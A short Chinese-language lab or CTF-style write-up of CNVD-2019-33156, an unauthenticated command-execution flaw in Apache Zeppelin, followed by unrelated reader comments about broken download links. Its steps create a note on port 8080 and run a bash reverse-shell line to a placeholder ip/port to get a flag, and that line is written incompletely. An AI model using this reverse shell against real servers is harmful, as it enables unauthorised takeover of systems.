CNVD-2019-33156
漏洞描述:Apache Zeppelin 存在未授权的用户访问命令执行接口,导致了任意用户都可以执行恶意命令获取服务器权限
影响版本:Zeppelin
参考资料:
●https://edu.hetianlab.com/post/94
●https://www.adminxe.com/2172.html
漏洞复现
●进入8080端口,新建note笔记
选择sh或者其它的脚本语言
- 执行反弹shell命令
bash -i /dev/tcp/ip/port <&1
获取flag
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
昶之琴 4小时前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 12小时前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下